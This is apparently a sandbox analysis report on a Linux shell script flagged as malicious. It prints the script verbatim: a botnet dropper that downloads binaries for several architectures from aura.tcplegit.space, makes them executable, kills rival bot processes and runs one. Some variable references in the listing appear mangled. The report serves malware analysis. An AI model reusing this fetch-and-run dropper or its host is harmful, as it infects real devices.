Malwagon
download_and_run.sh File Analysis · submitted Sep 7, 2026 21:46 · 992.0 B
1proc 1net 2DNS 300files 6drops 15IOCs
Malicious92 Linux Completed Public
Get sample Report Sign in

Malicious

92/100

22 points past the malicious line at 70.

Clean0-34 Suspicious35-69 Malicious70-100

Why this verdict

+80
Threat intelligence
  • MalwareBazaar known sample
  • Known malicious hash (feed): malwarebazaar: n/a
+12
Runtime behavior
  • dropped_file

Analysis layers

Static ran no points
Dynamic ran moved the score
Threat intel ran moved the score
AI ran no points

Sample

TypeFile Linux
MIMEtext/x-shellscript

Run conditions

Sandbox OSUbuntu 24.04 (Linux sandbox)
InternetIsolated

Detection signatures

1 detected
Severity Detection Evidence Layer
MED
Dropped file
runtime dropped file observed in the guest
dynamic

Structure

What the file is made of: headers, imports, how it was built and whether it was signed.

Signature
Script: Shell
Not packed
Identity
File
typePOSIX shell script, ASCII text executable
size992.0 B
entropy4.6639
Packing
Not packed
The file's code is readable on disk - nothing is compressed or encrypted around it.
0/100
packer confidence
Static analysis reads this file directly Nothing is hiding the code from a static pass, so what the file contains is what the report shows.
Indicators weighed

Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.

File content

21 lines · 992 bytes

The sample verbatim, shown as inert text - nothing here is interpreted by this page.

#!/bin/sh
mkdir -p /tmp/dl 2>/dev/null
wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null
wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null
wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null
wget -O /tmp/dl/main_arm http://aura.tcplegit.space/main_arm 2>/dev/null
wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null
wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null
chmod 777 /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4 2>/dev/null
for f in /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4; do
  if [ -s \ ]; then
    killall main 2>/dev/null
    killall condi 2>/dev/null
    killall bot 2>/dev/null
    killall httpd 2>/dev/null
    killall softbot 2>/dev/null
    killall kaiten 2>/dev/null
    \ &
    break
  fi
done

Extracted strings

showing 16
  • wget -O /tmp/dl/main_x86_64 http://aura.tcplegit.space/main_x86_64 2>/dev/null
  • wget -O /tmp/dl/main_aarch64 http://aura.tcplegit.space/main_aarch64 2>/dev/null
  • wget -O /tmp/dl/main_mips http://aura.tcplegit.space/main_mips 2>/dev/null
  • wget -O /tmp/dl/main_arm http://aura.tcplegit.space/main_arm 2>/dev/null
  • wget -O /tmp/dl/main_powerpc http://aura.tcplegit.space/main_powerpc 2>/dev/null
  • wget -O /tmp/dl/main_sh4 http://aura.tcplegit.space/main_sh4 2>/dev/null
  • chmod 777 /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4 2>/dev/null
  • for f in /tmp/dl/main_x86_64 /tmp/dl/main_aarch64 /tmp/dl/main_mips /tmp/dl/main_arm /tmp/dl/main_powerpc /tmp/dl/main_sh4; do
  • killall main 2>/dev/null
  • killall condi 2>/dev/null
  • killall bot 2>/dev/null
  • killall httpd 2>/dev/null
  • killall softbot 2>/dev/null
  • killall kaiten 2>/dev/null
  • break
  • done

Stack and decoded strings were not recovered: this file format is not eligible for string emulation. Only literal strings present in the file are listed above.

VM console

headless guest

The Linux sandbox runs a server image with no desktop, so there is no screen to record - this is the boot console, kept because a kernel panic or an out-of-memory kill would show up here and in no other layer. What the sample did is under Behavior, File & registry and Network, captured from the syscall trace rather than from pixels.

VM console

Behavior summary

1 process(es) observed; 6 dropped file(s)

Launched/var/tmp/download_and_run.sh
Defense Evasion::Linux and Mac File and Directory Permissions Modification [T1222.002]Execution::Native API [T1106]Command and Control::Application Layer Protocol [T1071]Execution::Command and Scripting Interpreter [T1059]
dropped_file

MITRE ATT&CK

4 techniques
Defense Evasion
Linux and Mac File and Directory Permissions Modification
T1222.002
Execution
Native API
T1106
Command and Control
Application Layer Protocol
T1071
Execution
Command and Scripting Interpreter
T1059

Syscall summary

top calls
brk22
mmap299
chdir1
mkdir2
wait48
access10
execve1
getcwd1
munmap9
openat350
socket24
statfs2
connect24
fchmodat6
mprotect77
recvfrom48
sendmmsg24
exit_group9
newfstatat72
setsockopt12
rt_sigaction37
rt_sigreturn8
rt_sigprocmask17

Persistence & evasion

No persistence or evasion behavior observed.

DNS queries

2 unique
DomainType
aura.tcplegit.space A
aura.tcplegit.space AAAA

Also watched

no result to show
ObserverResultWhat it means
TCP / UDP connections none The guest agent recorded no socket to a remote host.
TLS handshakes none No TLS session was negotiated, so there is no JA3/JA4 fingerprint to compare.
Beaconing analysis not run The interval analysis had no traffic to work from.
DGA scoring no candidate No resolved name scored as algorithmically generated.
IDS ruleset 0 alerts The capture was replayed through the IDS ruleset and matched nothing.

Process tree

What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.

1process
300file operations
6dropped files

download_and_run.sh

1 process
1 process

Attributed activity

0Mechanisms found
90Methods checked
0ATT&CK techniques
NONEHighest severity

Established mechanisms

clean

No persistence established

None of the 90 auto-start methods below were established during this run.

Detection coverage

0 / 90

Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.

Logon & Startup 22 clean
  • Active Setup Installed Component T1547.014 clean
  • Explorer Delay-Load Object T1547.001 clean
  • Explorer Run Key T1547.001 clean
  • Explorer SharedTaskScheduler T1547.001 clean
  • Group Policy Extension DLL T1547.004 clean
  • Group Policy Run Key T1547.001 clean
  • Logon Script T1037.001 clean
  • RDP WDS Startup Program T1547.001 clean
  • Registry Run Key T1547.001 clean
  • Registry RunEx Key T1547.001 clean
  • Registry RunOnce Key T1547.001 clean
  • Registry RunOnceEx Key T1547.001 clean
  • Registry RunServices Key T1547.001 clean
  • Startup Folder Item T1547.001 clean
  • Startup Folder Redirection T1547.001 clean
  • Terminal Services Initial Program T1547.001 clean
  • Winlogon GINA DLL T1547.004 clean
  • Winlogon MPNotify Value T1547.004 clean
  • Winlogon Notify Package T1547.004 clean
  • Winlogon Shell Value T1547.004 clean
  • Winlogon Taskman Value T1547.004 clean
  • Winlogon Userinit Value T1547.004 clean
Services & Tasks 9 clean
  • BITS Job T1197 clean
  • Print Monitor DLL T1547.010 clean
  • Print Processor DLL T1547.012 clean
  • Scheduled Task T1053.005 clean
  • Scheduled Task Registry Implant T1053.005 clean
  • Service Control Manager Security Descriptor T1574.011 clean
  • Service DLL Hijack T1543.003 clean
  • Time Provider DLL T1547.003 clean
  • Windows Service Creation T1543.003 clean
Execution Hijack 17 clean
  • .NET Managed Debugger T1546.012 clean
  • Accessibility Tool Hijack T1546.008 clean
  • AeDebug Postmortem Debugger T1546.012 clean
  • App Paths Hijack T1546.012 clean
  • Application Shim Database T1546.011 clean
  • Boot Verification Program T1547.002 clean
  • Command Processor AutoRun T1546.011 clean
  • Explorer Load Value T1547.001 clean
  • Explorer MyComputer Tool Hijack T1546.001 clean
  • Registry Image File Execution Options T1546.012 clean
  • Screensaver Hijack T1546.002 clean
  • Setup ErrorHandler Script T1546 clean
  • Shell Open Command Hijack T1546.001 clean
  • SilentProcessExit Monitor T1546.012 clean
  • Telemetry Controller Command T1546.015 clean
  • WER ReflectDebugger T1546.012 clean
  • Windows Error Reporting Debugger T1546.012 clean
DLL Load Order 12 clean
  • .NET CLR Profiler DLL T1574.012 clean
  • .NET Startup Hook DLL T1574 clean
  • AppCert DLLs T1546.009 clean
  • AppInit DLLs T1546.010 clean
  • AutodialDLL Winsock Injection T1546.006 clean
  • DLL Search-Order Hijack T1574.001 T1574.002 clean
  • DNS Server Plugin DLL T1574.001 clean
  • HTML Help Helper DLL T1546 clean
  • KnownDLLs Manipulation T1574.001 clean
  • Natural Language Platform DLL Override T1546 clean
  • Netsh Helper DLL T1546.007 clean
  • Winsock Layered Service Provider T1546.006 clean
COM & Browser 6 clean
  • Browser Extension T1176 clean
  • Browser Helper Object T1176 clean
  • COM Server Hijack T1546.015 clean
  • HTML Help COM Object Hijack T1546.015 clean
  • Shell Context Menu Handler T1546.001 clean
  • Shell Extension Handler T1546.001 clean
Security Providers & Accounts 11 clean
  • Account RID Hijack T1098 clean
  • AMSI Provider T1562.001 clean
  • Credential Provider T1547.014 clean
  • DSRM Admin Logon Backdoor T1556 clean
  • Hidden Local Account T1136.001 clean
  • LSA Authentication Package T1547.002 clean
  • LSA Extension DLL T1547.005 clean
  • LSA Notification Package T1547.005 clean
  • LSA Security Package T1547.005 clean
  • Network Provider DLL T1556.008 clean
  • Security Support Provider T1547.005 clean
Scripting & Applications 9 clean
  • Netsh Port Proxy T1090.001 clean
  • Office Add-in T1137.006 clean
  • Office Executable Sideload T1574.002 clean
  • Office Startup Template T1137.001 clean
  • Office Test Key T1137.002 clean
  • Power Automate Flow T1546 clean
  • PowerShell Profile T1546.013 clean
  • Windows Terminal Startup Action T1546 clean
  • WMI Event Subscription T1546.003 clean
Boot & Firmware 4 clean
  • BootExecute Native Image T1547.002 clean
  • PlatformExecute Native Image T1547.002 clean
  • SetupExecute Native Image T1547.002 clean
  • UEFI / Bootkit Artifact T1542.003 T1542.001 clean

File activity summary

create 14 write 0 modify 6 delete 0 rename 0

Dropped files

6 payloads
PathSHA-256SizeProcessTimeDownload
/tmp/dl/main_x86_64 - - - pid 683 22:10:40.388598 -
/tmp/dl/main_aarch64 - - - pid 684 22:10:40.485972 -
/tmp/dl/main_mips - - - pid 685 22:10:40.584609 -
/tmp/dl/main_arm - - - pid 686 22:10:40.682717 -
/tmp/dl/main_powerpc - - - pid 687 22:10:40.776800 -
/tmp/dl/main_sh4 - - - pid 688 22:10:40.878515 -

File & registry ops

300 file · 0 registry · sample scope
OperationTargetProcess
read
/etc/ld.so.cache
syscall_trace
- pid 681 22:10:40.290872
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 681 22:10:40.293806
read
/var/tmp/download_and_run.sh
syscall_trace
- pid 681 22:10:40.310613
create
/dev/null
syscall_trace
- pid 681 22:10:40.316078
read
/etc/ld.so.cache
syscall_trace
- pid 682 22:10:40.325329
read
/lib/x86_64-linux-gnu/libselinux.so.1
syscall_trace
- pid 682 22:10:40.326586
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 682 22:10:40.327152
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 682 22:10:40.327897
read
/proc/filesystems
syscall_trace
- pid 682 22:10:40.329610
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 682 22:10:40.329882
create
/dev/null
syscall_trace
- pid 681 22:10:40.332901
read
/etc/ld.so.cache
syscall_trace
- pid 683 22:10:40.341822
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 683 22:10:40.343605
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 683 22:10:40.347142
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 683 22:10:40.350678
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 683 22:10:40.353407
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 683 22:10:40.356026
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 683 22:10:40.358485
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 683 22:10:40.361303
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 683 22:10:40.365926
read
/lib/x86_64-linux-gnu/libunistring.so.5
syscall_trace
- pid 683 22:10:40.369117
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 683 22:10:40.382951
read
/etc/wgetrc
syscall_trace
- pid 683 22:10:40.384778
create
/tmp/dl/main_x86_64
syscall_trace
- pid 683 22:10:40.388598
read
/etc/localtime
syscall_trace
- pid 683 22:10:40.391571
read
/usr/share/locale/locale.alias
syscall_trace
- pid 683 22:10:40.394276
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.396109
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.396554
read
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.396915
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.397289
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.397607
read
/usr/share/locale/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.397970
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.398381
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.398756
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.399119
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.399553
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.399912
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 683 22:10:40.400282
read
/etc/nsswitch.conf
syscall_trace
- pid 683 22:10:40.404031
read
/etc/host.conf
syscall_trace
- pid 683 22:10:40.405632
read
/etc/resolv.conf
syscall_trace
- pid 683 22:10:40.408199
read
/etc/hosts
syscall_trace
- pid 683 22:10:40.410599
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.432649
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.433089
read
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.433598
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.434065
read
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.434480
read
/usr/share/locale/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.434773
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.435063
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.435397
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.435702
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.435991
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.436286
read
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 683 22:10:40.436736
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.437709
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.438107
read
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.438563
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.438925
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.439491
read
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.439856
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.440268
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.440686
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.441054
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.441446
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.441806
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 683 22:10:40.442169
create
/dev/null
syscall_trace
- pid 681 22:10:40.445985
read
/etc/ld.so.cache
syscall_trace
- pid 684 22:10:40.450143
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 684 22:10:40.451110
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 684 22:10:40.453200
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 684 22:10:40.455555
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 684 22:10:40.457931
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 684 22:10:40.460263
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 684 22:10:40.462881
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 684 22:10:40.465369
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 684 22:10:40.467447
read
/lib/x86_64-linux-gnu/libunistring.so.5
syscall_trace
- pid 684 22:10:40.470605
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 684 22:10:40.481459
read
/etc/wgetrc
syscall_trace
- pid 684 22:10:40.482942
create
/tmp/dl/main_aarch64
syscall_trace
- pid 684 22:10:40.485972
read
/etc/localtime
syscall_trace
- pid 684 22:10:40.489617
read
/usr/share/locale/locale.alias
syscall_trace
- pid 684 22:10:40.492757
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.494411
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.494776
read
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.495138
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.495591
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.495958
read
/usr/share/locale/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.496387
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.496825
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.497485
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.497936
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.498399
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.498764
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 684 22:10:40.499126
read
/etc/nsswitch.conf
syscall_trace
- pid 684 22:10:40.502520
read
/etc/host.conf
syscall_trace
- pid 684 22:10:40.504564
read
/etc/resolv.conf
syscall_trace
- pid 684 22:10:40.506143
read
/etc/hosts
syscall_trace
- pid 684 22:10:40.507769
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.525948
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.526191
read
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.526428
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.526727
read
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.527033
read
/usr/share/locale/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.527365
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.527618
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.527854
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.528089
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.528363
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.528619
read
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 684 22:10:40.528866
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.529448
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.529810
read
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.530170
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.530440
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.530800
read
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.531158
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.531542
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.531901
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.532361
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.532726
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.533093
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 684 22:10:40.533403
create
/dev/null
syscall_trace
- pid 681 22:10:40.537210
read
/etc/ld.so.cache
syscall_trace
- pid 685 22:10:40.542145
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 685 22:10:40.543329
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 685 22:10:40.545628
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 685 22:10:40.548164
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 685 22:10:40.551294
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 685 22:10:40.554039
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 685 22:10:40.557697
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 685 22:10:40.561494
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 685 22:10:40.564080
read
/lib/x86_64-linux-gnu/libunistring.so.5
syscall_trace
- pid 685 22:10:40.567742
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 685 22:10:40.579300
read
/etc/wgetrc
syscall_trace
- pid 685 22:10:40.581317
create
/tmp/dl/main_mips
syscall_trace
- pid 685 22:10:40.584609
read
/etc/localtime
syscall_trace
- pid 685 22:10:40.588496
read
/usr/share/locale/locale.alias
syscall_trace
- pid 685 22:10:40.591517
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.593169
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.593406
read
/usr/share/locale/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.593822
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.594320
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.594693
read
/usr/share/locale/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.595053
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.595515
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.595874
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.596380
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.596753
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.597146
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget.mo
syscall_trace
- pid 685 22:10:40.597589
read
/etc/nsswitch.conf
syscall_trace
- pid 685 22:10:40.600750
read
/etc/host.conf
syscall_trace
- pid 685 22:10:40.602342
read
/etc/resolv.conf
syscall_trace
- pid 685 22:10:40.603823
read
/etc/hosts
syscall_trace
- pid 685 22:10:40.605358
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.624803
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.625120
read
/usr/share/locale/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.625360
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.625695
read
/usr/share/locale/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.626008
read
/usr/share/locale/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.626334
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.626656
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.626970
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.627361
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.627669
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.628018
read
/usr/share/locale-langpack/en/LC_MESSAGES/libc.mo
syscall_trace
- pid 685 22:10:40.628348
read
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.629069
read
/usr/share/locale/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.629445
read
/usr/share/locale/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.629812
read
/usr/share/locale/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.630173
read
/usr/share/locale/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.630508
read
/usr/share/locale/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.630869
read
/usr/share/locale-langpack/en_US.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.631315
read
/usr/share/locale-langpack/en_US.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.631689
read
/usr/share/locale-langpack/en_US/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.632050
read
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.632504
read
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.632869
read
/usr/share/locale-langpack/en/LC_MESSAGES/wget-gnulib.mo
syscall_trace
- pid 685 22:10:40.633315
create
/dev/null
syscall_trace
- pid 681 22:10:40.637078
read
/etc/ld.so.cache
syscall_trace
- pid 686 22:10:40.641292
read
/lib/x86_64-linux-gnu/libpcre2-8.so.0
syscall_trace
- pid 686 22:10:40.642367
read
/lib/x86_64-linux-gnu/libuuid.so.1
syscall_trace
- pid 686 22:10:40.644785
read
/lib/x86_64-linux-gnu/libidn2.so.0
syscall_trace
- pid 686 22:10:40.647432
read
/lib/x86_64-linux-gnu/libssl.so.3
syscall_trace
- pid 686 22:10:40.649730
read
/lib/x86_64-linux-gnu/libcrypto.so.3
syscall_trace
- pid 686 22:10:40.652017
read
/lib/x86_64-linux-gnu/libz.so.1
syscall_trace
- pid 686 22:10:40.654990
read
/lib/x86_64-linux-gnu/libpsl.so.5
syscall_trace
- pid 686 22:10:40.657733
read
/lib/x86_64-linux-gnu/libc.so.6
syscall_trace
- pid 686 22:10:40.660299
read
/lib/x86_64-linux-gnu/libunistring.so.5
syscall_trace
- pid 686 22:10:40.663911
read
/usr/lib/locale/locale-archive
syscall_trace
- pid 686 22:10:40.676829
read
/etc/wgetrc
syscall_trace
- pid 686 22:10:40.679032
create
/tmp/dl/main_arm
syscall_trace
- pid 686 22:10:40.682717
read
/etc/localtime
syscall_trace
- pid 686 22:10:40.686065
